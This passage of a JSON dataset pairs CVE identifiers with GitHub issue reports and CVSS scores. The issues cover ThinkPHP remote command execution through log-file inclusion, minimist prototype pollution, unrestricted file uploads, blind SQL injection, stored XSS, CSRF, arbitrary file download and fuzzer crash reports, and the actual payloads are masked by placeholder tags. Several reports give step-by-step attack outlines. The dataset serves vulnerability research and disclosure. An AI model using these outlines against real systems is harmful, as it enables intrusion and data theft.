        "description": "APITAG has a remote command execution vulnerability. Some time ago I submitted a vulnerability in the Chinese APITAG are the details. You can find this in URLTAG This is due to the combination of two functions(thinkphp) resulting in the command execution ERRORTAG As you know, these two functions are related to template rendering, and this combination has been seen in Chinese APITAG are the utilization details; First we create the route according to the official documentation; At first\uff0ccreate APITAG ERRORTAG then create APITAG APITAG is no need for any content in this like this FILETAG then We need APITAG it can send payload without url encoded characters APITAG FILETAG thinkphp will save access logs APITAG with date FILETAG then we just need to type url below: ERRORTAG success\uff01\uff01\uff01we can contain malicious payloads\uff01\uff01\uff01 FILETAG Next I will explain how this vulnerability was created. The following simplifies my narrative with pictures instead of words FILETAG then We can override the parameters in $this APITAG FILETAG then follow the function display FILETAG follow FILETAG Default parsing engine value is Think FILETAG follow FILETAG Continue, APITAG FILETAG Go to the exec method and call the run method of the APITAG class to process the value of $params with the path to the log file after processing go to APITAG FILETAG in PATHTAG FILETAG Go to the fetch method in the APITAG class, get the path to the cache file, and then go to the load method in Storage FILETAG Follow up to the load method of Storage, the filename is the previously fetched cache storage Document Document path path and var is the array with _filename=path to the log file FILETAG Finally we can include log files with malicious code",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-44906",
        "Issue_Url_old": "https://github.com/substack/minimist/issues/164",
        "Issue_Url_new": "https://github.com/substack/minimist/issues/164",
        "Repo_new": "substack/minimist",
        "Issue_Created_At": "2022-03-15T03:02:02Z",
        "description": "insufficient fix for prototype pollution in APITAG Despite the fix in URLTAG , there is still a way to exploit prototype pollution vulnerability. More specifically, there are handlers for prototypes of Object, String and Number, but no handler for the APITAG This prototype can be accessed through the default \u201c_\u201d property in the parsed arguments, which is an array. If the app developer sets properties on function objects (use case discussed here: URLTAG ), this can lead to undesired behavior.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44906",
        "Issue_Url_old": "https://github.com/minimistjs/minimist/issues/11",
        "Issue_Url_new": "https://github.com/minimistjs/minimist/issues/11",
        "Repo_new": "minimistjs/minimist",
        "Issue_Created_At": "2022-10-19T14:23:14Z",
        "description": "Backport of NUMBERTAG fixes to NUMBERTAG Thanks to the new maintainers for taking over this project. I see a new version of the NUMBERTAG line has been published even though it still _seems_ to be covered by CVETAG URLTAG . Is there any possibility of the FILETAG being backported, or is it necessary at all? I ask because the maintainers of one of the other packages we use have thus far not responded to suggestions to update URLTAG and a patch update to the NUMBERTAG line would obviate the need for that. And yes, I'm aware we can also use yarn resolutions, NPM overrides, etc. and the risk is probably fairly minimal in our use case \u2013 but I assume there's a reason the NUMBERTAG line is being maintained.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44908",
        "Issue_Url_old": "https://github.com/balderdashy/sails/issues/7209",
        "Issue_Url_new": "https://github.com/balderdashy/sails/issues/7209",
        "Repo_new": "balderdashy/sails",
        "Issue_Created_At": "2022-03-15T03:02:07Z",
        "description": "Prototype pollution in APITAG Node version NUMBERTAG Sails version _(sails NUMBERTAG else if statement in lines NUMBERTAG URLTAG is vulnerable to prototype pollution. The object assignment on line NUMBERTAG may lead to denial of service or property injection if APITAG based application dynamically controls the value of variable APITAG Proof of concept case is demonstrated here: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44911",
        "Issue_Url_old": "https://github.com/xpressengine/xe-core/issues/2434",
        "Issue_Url_new": "https://github.com/xpressengine/xe-core/issues/2434",
        "Repo_new": "xpressengine/xe-core",
        "Issue_Created_At": "2021-12-08T00:38:20Z",
        "description": "Unrestricted file upload vulnerability in Latest Release NUMBERTAG Affected version: XE before NUMBERTAG ulnerable file: PATHTAG menu_active_btn Causes of vulnerability: FILETAG When uploading the Mouse over button and When selected button , there is no restriction on the file suffix, which leads to any file uploading to the files directory. Since .htaccess only restricts the PHP type, uploading HTML type files leads to stored XSS vulnerabilities. If the .htaccess configuration is improper, for example before the XE NUMBERTAG ersion, you can upload the PHP type file to GETSHELL. deny access to files that may contain sensitive information APITAG ^(. APITAG FILETAG Repair suggestion: add the html file to the upload blacklist.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-44912",
        "Issue_Url_old": "https://github.com/xpressengine/xe-core/issues/2433",
        "Issue_Url_new": "https://github.com/xpressengine/xe-core/issues/2433",
        "Repo_new": "xpressengine/xe-core",
        "Issue_Created_At": "2021-12-08T00:36:19Z",
        "description": "Unrestricted file upload vulnerability in Latest Release NUMBERTAG APITAG Affected version: XE before NUMBERTAG ulnerable file: PATHTAG menu_normal_btn Causes of vulnerability: FILETAG When uploading the Normal button, there is no restriction on the file suffix, which leads to any file uploading to the files directory. Since .htaccess only restricts the PHP type, uploading HTML type files leads to stored XSS vulnerabilities. If the .htaccess configuration is improper, for example before the XE NUMBERTAG ersion, you can upload the PHP type file to GETSHELL. CODETAG FILETAG Repair suggestion: add the \\ html\\ file to the upload blacklist.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2021-44915",
        "Issue_Url_old": "https://github.com/taogogo/taocms/issues/8",
        "Issue_Url_new": "https://github.com/taogogo/taocms/issues/8",
        "Repo_new": "taogogo/taocms",
        "Issue_Created_At": "2021-12-07T08:51:23Z",
        "description": "There is SQL blind injection at APITAG APITAG administrator authority). Log in to the background as the default account admin. FILETAG We click in order and grab packets: FILETAG FILETAG FILETAG There is a time based blind SQL injection vulnerability in the location of id. FILETAG FILETAG POC: FILETAG APITAG AND (SELECT NUMBERTAG FROM APITAG AND APITAG sqlmap: Save the HTTP request package as a file . FILETAG Test using the APITAG tool : FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2021-44918",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1968",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1968",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-10T14:52:20Z",
        "description": "Null Pointer Dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result poc NUMBERTAG ERRORTAG poc NUMBERTAG ERRORTAG gdb poc NUMBERTAG CODETAG poc NUMBERTAG CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-44919",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1963",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1963",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-10T09:54:17Z",
        "description": "Null Pointer Dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-44920",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1957",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1957",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-10T08:00:30Z",
        "description": "Invalid memory address dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-44921",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1964",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1964",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-10T10:59:02Z",
        "description": "Null Pointer Dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result CODETAG gdb CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-44922",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1969",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1969",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-10T15:21:14Z",
        "description": "Null Pointer Dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG APITAG CODETAG CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-44923",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1962",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1962",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-10T09:31:57Z",
        "description": "Null Pointer Dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-44924",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1959",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1959",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-10T08:26:37Z",
        "description": "Infinite loop in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result CODETAG gdb CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-44925",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1967",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1967",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-10T14:38:22Z",
        "description": "Null Pointer Dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-44926",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1961",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1961",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-10T09:26:26Z",
        "description": "Null Pointer Dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-44927",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/1960",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/1960",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2021-12-10T08:38:06Z",
        "description": "Null Pointer Dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-44935",
        "Issue_Url_old": "https://github.com/glFusion/glfusion/issues/482",
        "Issue_Url_new": "https://github.com/glfusion/glfusion/issues/482",
        "Repo_new": "glfusion/glfusion",
        "Issue_Created_At": "2021-12-08T08:13:57Z",
        "description": "Arbitrary user impersonation vulnerability. In the article comments\uff0cWe can impersonate any user to APITAG can even impersonate a system administrator FILETAG FILETAG )",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44937",
        "Issue_Url_old": "https://github.com/glFusion/glfusion/issues/485",
        "Issue_Url_new": "https://github.com/glfusion/glfusion/issues/485",
        "Repo_new": "glfusion/glfusion",
        "Issue_Created_At": "2021-12-09T06:17:55Z",
        "description": "APITAG CMS NUMBERTAG Arbitrary user registration vulnerability. There is a logical problem with the user registration page After clicking the register button, the user does not need to confirm the email. The system directly saves the submitted content in the database. This leads to a problem. An attacker can register with the mailbox of any user. When users want to register, they will find that the mailbox has been occupied. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44942",
        "Issue_Url_old": "https://github.com/glFusion/glfusion/issues/486",
        "Issue_Url_new": "https://github.com/glfusion/glfusion/issues/486",
        "Repo_new": "glfusion/glfusion",
        "Issue_Created_At": "2021-12-09T07:11:09Z",
        "description": "APITAG CMS NUMBERTAG FILETAG CSRF vulnerability. Attackers can construct blacklist IP addresses. Using the CSRF vulnerability to trick the administrator to click, can add a blacklist poc CODETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-44949",
        "Issue_Url_old": "https://github.com/glFusion/glfusion/issues/487",
        "Issue_Url_new": "https://github.com/glfusion/glfusion/issues/487",
        "Repo_new": "glfusion/glfusion",
        "Issue_Created_At": "2021-12-09T10:12:28Z",
        "description": "APITAG CMS NUMBERTAG user Login denied vulnerability. We can get username on this link: APITAG FILETAG So, attacker can get all username . Then they can always log in to all users with the wrong password, which will prevent all users from logging in to the website normally. FILETAG There are two solutions NUMBERTAG set the verification code on the login page NUMBERTAG The second is to display the user's nickname instead of the login name",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-44956",
        "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/43",
        "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/43",
        "Repo_new": "rockcarry/ffjpeg",
        "Issue_Created_At": "2021-06-23T19:48:31Z",
        "description": "Heap buffer overflows in APITAG at APITAG and NUMBERTAG Describe Two Heap buffer overflows were discovered in ffjpeg. The issues are being triggered in function jfif_decode at APITAG and NUMBERTAG Found by Cem Onat Karagun of Diesec System info OS version : Ubuntu NUMBERTAG ffjpeg Version : master NUMBERTAG fa4cf8a NUMBERTAG URLTAG Reproduce Compile ffjpeg with address sanitizer. APITAG POC Files: FILETAG FILETAG Run POCs with the commands below. APITAG Asan output NUMBERTAG ERRORTAG Asan output NUMBERTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-44957",
        "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/44",
        "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/44",
        "Repo_new": "rockcarry/ffjpeg",
        "Issue_Created_At": "2021-06-23T19:51:49Z",
        "description": "global buffer overflow in function jfif_encode at APITAG Describe A global buffer overflow was discovered in ffjpeg. The issue is being triggered in function jfif_encode at APITAG Found by Cem Onat Karagun of Diesec System info OS version : Ubuntu NUMBERTAG ffjpeg Version : master NUMBERTAG fa4cf8a NUMBERTAG URLTAG Reproduce Compile ffjpeg with address sanitizer. APITAG APITAG file: FILETAG Run with the following command. APITAG Asan output: ERRORTAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-44960",
        "Issue_Url_old": "https://github.com/svgpp/svgpp/issues/101",
        "Issue_Url_new": "https://github.com/svgpp/svgpp/issues/101",
        "Repo_new": "svgpp/svgpp",
        "Issue_Created_At": "2021-12-06T16:55:10Z",
        "description": "New vulnerability. FILETAG APITAG The APITAG function in the APITAG function handled the APITAG object improperly, returning a null pointer in advance at the second if, resulting in a null pointer reference behind the APITAG function. APITAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG d NUMBERTAG e bp NUMBERTAG fffc6d NUMBERTAG dd0 sp NUMBERTAG fffc6d NUMBERTAG T0) APITAG signal is caused by a READ memory access. APITAG address points to the zero page NUMBERTAG d NUMBERTAG e in APITAG const PATHTAG NUMBERTAG d NUMBERTAG e in APITAG const APITAG const ) PATHTAG NUMBERTAG d NUMBERTAG e in bool APITAG APITAG APITAG double, svgpp::tag::length_units::mm> const> >, APITAG >, APITAG APITAG APITAG APITAG APITAG >, APITAG >, APITAG >, APITAG APITAG APITAG APITAG const , Canvas, APITAG const const&, Canvas&, svgpp::tag::element::svg) PATHTAG NUMBERTAG d NUMBERTAG e in bool APITAG APITAG APITAG double, svgpp::tag::length_units::mm> const> >, APITAG >, APITAG APITAG APITAG APITAG APITAG >, APITAG >, APITAG >, APITAG APITAG APITAG APITAG const , APITAG const const&, Canvas&) PATHTAG NUMBERTAG d NUMBERTAG e in APITAG APITAG PATHTAG NUMBERTAG d8b NUMBERTAG in main PATHTAG NUMBERTAG fb2c6bd3d NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG bc9 in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in APITAG const NUMBERTAG ABORTING APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-44969",
        "Issue_Url_old": "https://github.com/taogogo/taocms/issues/9",
        "Issue_Url_new": "https://github.com/taogogo/taocms/issues/9",
        "Repo_new": "taogogo/taocms",
        "Issue_Created_At": "2021-12-09T12:19:43Z",
        "description": "There is a storage type cross site scripting attack at APITAG APITAG administrator authority) . First, we enter the background and use the column administrator admin we created: FILETAG Let's click \"add article\" on the left: FILETAG Insert xss payload at the title \uff1a APITAG APITAG Return to the background management APITAG click \"edit article\" on the left: FILETAG Come back to the front APITAG it is the title of the article, the front desk is also affected FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2021-44974",
        "Issue_Url_old": "https://github.com/radareorg/radare2/issues/19478",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/19478",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2021-12-07T22:50:34Z",
        "description": "NULL pointer dereference in APITAG . NULL pointer dereference in APITAG I have discovered a NULL / Invalid pointer dereference bug, that gets triggered while parsing the symbols of a binary. Environment ERRORTAG ASAN Stack Trace from an ASAN build while triggering the bug ERRORTAG APITAG symbols ERRORTAG APITAG array, is an array of symbols for an object of the file that is being loaded for analysis. In case were the pointer APITAG APITAG APITAG APITAG sym variable will be set to APITAG APITAG bf ERRORTAG APITAG ` I would highly appreciate if that bug qualifies for a CVE for you to request it for me. FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-44975",
        "Issue_Url_old": "https://github.com/radareorg/radare2/issues/19476",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/19476",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2021-12-07T21:05:25Z",
        "description": "Heap buffer overflow in function objc_build_refs while parsing mach o files.. Heap Buffer overflow in objc_build_refs I have discovered a heap buffer overflow while parsing mach o executables. Please refer bellow for further information. Environment CODETAG ASAN Stack Trace from an ASAN build while triggering the bug ERRORTAG APITAG APITAG ERRORTAG APITAG and APITAG theres an attempt to sanitize the APITAG variable as it has to be done. Based on the return value of the two macros which is stored in the maxsize ERRORTAG buf ERRORTAG APITAG variable instead of the maxsize one. In case where the APITAG is greater than the maxsize APITAG maxsize ERRORTAG APITAG to be called with the variable maxsize instead of the APITAG ERRORTAG APITAG ` I would highly appreciate if that bug qualifies for a CVE for you to request it for me.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-44981",
        "Issue_Url_old": "https://github.com/QuickBox/QB/issues/202",
        "Issue_Url_new": "https://github.com/quickbox/qb/issues/202",
        "Repo_new": "quickbox/qb",
        "Issue_Created_At": "2021-12-09T10:22:21Z",
        "description": "Responsible disclosure policy. Hey there! I belong to an open source security research community, and a member ( APITAG has found an issue, but doesn\u2019t know the best way to disclose it. If not a hassle, might you kindly add a APITAG file with an email, or another contact method? APITAG recommends URLTAG this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future. Thank you for your consideration, and I look forward to hearing from you! (cc APITAG helper)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-44983",
        "Issue_Url_old": "https://github.com/taogogo/taocms/issues/10",
        "Issue_Url_new": "https://github.com/taogogo/taocms/issues/10",
        "Repo_new": "taogogo/taocms",
        "Issue_Created_At": "2021-12-10T02:25:30Z",
        "description": "There is a Arbitrary file download attack at \" File Management column\"(administrator authority). First, we enter the background and use the administrator admin we created: FILETAG Let's click \"file management\" on the left: FILETAG Then use Burp Suite and click Download to grab the request package FILETAG FILETAG Changing the \u201cpath\u201d parameter FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.9,
        "impactScore": 3.6,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2021-44988",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4890",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4890",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2021-12-09T14:27:01Z",
        "description": "Stack overflow in ecma_lcache_lookup (ecma lcache.c). APITAG revision Commit NUMBERTAG da NUMBERTAG URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-44988",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4891",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4891",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2021-12-09T14:33:33Z",
        "description": "Stack overflow in ecma_find_named_property (ecma helpers.c). APITAG revision Commit NUMBERTAG da NUMBERTAG URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Build steps ERRORTAG Test case APITAG \u200b Execution steps & Output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-44992",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4875",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4875",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2021-12-09T09:08:53Z",
        "description": "Assertion 'ecma_object_is_typedarray (obj_p)' failed in ecma typedarray APITAG APITAG revision Commit NUMBERTAG da NUMBERTAG URLTAG Version NUMBERTAG Commit NUMBERTAG ba0d1b URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG \u200b Execution steps & Output Version NUMBERTAG ERRORTAG Version NUMBERTAG ERRORTAG `",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-44993",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4876",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4876",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2021-12-09T09:48:50Z",
        "description": "Assertion 'ecma_is_value_boolean (base_value)' failed in ecma_op_get_value_object_base (ecma get put value).. APITAG revision Commit NUMBERTAG da NUMBERTAG URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG \u200b Execution steps & Output version NUMBERTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-44994",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4894",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4894",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2021-12-09T14:53:08Z",
        "description": "Assertion 'JERRY_CONTEXT (jmem_heap_allocated_size NUMBERTAG failed at PATHTAG (jmem_heap_finalize NUMBERTAG APITAG commit hash APITAG Build platform Ubuntu NUMBERTAG LTS Build steps ERRORTAG poc APITAG assert log ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2021-44994",
        "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4895",
        "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4895",
        "Repo_new": "jerryscript-project/jerryscript",
        "Issue_Created_At": "2021-12-09T14:58:57Z",
